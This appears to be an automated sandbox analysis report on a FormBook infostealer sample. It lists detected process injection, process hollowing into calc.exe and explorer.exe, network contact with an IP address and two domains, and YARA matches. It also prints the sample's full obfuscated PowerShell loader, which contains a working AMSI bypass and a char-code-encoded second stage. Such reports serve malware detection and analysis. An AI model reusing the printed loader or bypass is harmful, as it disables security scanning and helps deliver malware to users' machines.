          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov ecx, dword ptr fs:[00000030h]19_2_02ABF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov eax, dword ptr fs:[00000030h]19_2_02ABF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov eax, dword ptr fs:[00000030h]19_2_02ABF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89080 mov eax, dword ptr fs:[00000030h]19_2_02A89080
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9849B mov eax, dword ptr fs:[00000030h]19_2_02A9849B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03884 mov eax, dword ptr fs:[00000030h]19_2_02B03884
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03884 mov eax, dword ptr fs:[00000030h]19_2_02B03884
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]19_2_02B06CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]19_2_02B06CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]19_2_02B06CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B414FB mov eax, dword ptr fs:[00000030h]19_2_02B414FB
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]19_2_02B1B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov ecx, dword ptr fs:[00000030h]19_2_02B1B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]19_2_02B1B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]19_2_02B1B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]19_2_02B1B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]19_2_02B1B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58CD6 mov eax, dword ptr fs:[00000030h]19_2_02B58CD6
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]19_2_02A9B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]19_2_02A9B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]19_2_02A9B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]19_2_02A9B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABBC2C mov eax, dword ptr fs:[00000030h]19_2_02ABBC2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B54015 mov eax, dword ptr fs:[00000030h]19_2_02B54015
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B54015 mov eax, dword ptr fs:[00000030h]19_2_02B54015
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]19_2_02B07016
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]19_2_02B07016
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]19_2_02B07016
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]19_2_02B41C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]19_2_02B5740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]19_2_02B5740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]19_2_02B5740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]19_2_02B06C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]19_2_02B06C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]19_2_02B06C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]19_2_02B06C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B51074 mov eax, dword ptr fs:[00000030h]19_2_02B51074
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B42073 mov eax, dword ptr fs:[00000030h]19_2_02B42073
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA746D mov eax, dword ptr fs:[00000030h]19_2_02AA746D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA44B mov eax, dword ptr fs:[00000030h]19_2_02ABA44B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1C450 mov eax, dword ptr fs:[00000030h]19_2_02B1C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1C450 mov eax, dword ptr fs:[00000030h]19_2_02B1C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA0050 mov eax, dword ptr fs:[00000030h]19_2_02AA0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA0050 mov eax, dword ptr fs:[00000030h]19_2_02AA0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB35A1 mov eax, dword ptr fs:[00000030h]19_2_02AB35A1
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB61A0 mov eax, dword ptr fs:[00000030h]19_2_02AB61A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB61A0 mov eax, dword ptr fs:[00000030h]19_2_02AB61A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]19_2_02A82D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]19_2_02A82D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]19_2_02A82D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]19_2_02A82D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]19_2_02A82D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC182 mov eax, dword ptr fs:[00000030h]19_2_02AAC182
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA185 mov eax, dword ptr fs:[00000030h]19_2_02ABA185
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFD9B mov eax, dword ptr fs:[00000030h]19_2_02ABFD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFD9B mov eax, dword ptr fs:[00000030h]19_2_02ABFD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B38DF1 mov eax, dword ptr fs:[00000030h]19_2_02B38DF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]19_2_02A8B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]19_2_02A8B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]19_2_02A8B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]19_2_02A9D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]19_2_02A9D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B141E8 mov eax, dword ptr fs:[00000030h]19_2_02B141E8
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58D34 mov eax, dword ptr fs:[00000030h]19_2_02B58D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B0A537 mov eax, dword ptr fs:[00000030h]19_2_02B0A537
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov ecx, dword ptr fs:[00000030h]19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]19_2_02AB4D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]19_2_02AB4D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]19_2_02AB4D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h]19_2_02AB513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h]19_2_02AB513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8AD30 mov eax, dword ptr fs:[00000030h]19_2_02A8AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]19_2_02A93D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]19_2_02A89100
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]19_2_02A89100
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]19_2_02A89100
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C962 mov eax, dword ptr fs:[00000030h]19_2_02A8C962
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h]19_2_02A8B171
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h]19_2_02A8B171
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h]19_2_02AAC577
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h]19_2_02AAC577
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h]19_2_02AAB944
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h]19_2_02AAB944
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC3D43 mov eax, dword ptr fs:[00000030h]19_2_02AC3D43
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03540 mov eax, dword ptr fs:[00000030h]19_2_02B03540
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA7D50 mov eax, dword ptr fs:[00000030h]19_2_02AA7D50
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeCode function: 1_2_00401180 Sleep,Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,Sleep,exit,1_2_00401180

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.130 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.strawberrylinebikehire.com
          Source: C:\Windows\explorer.exeDomain query: www.rajuherbalandspicegarden.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 1F0000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 401000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 2BC5008Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'Jump to behavior
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,Jump to behavior
          Source: explorer.exe, 0000000A.00000000.304127753.00000000089FF000.00000004.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000A.00000000.315976236.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
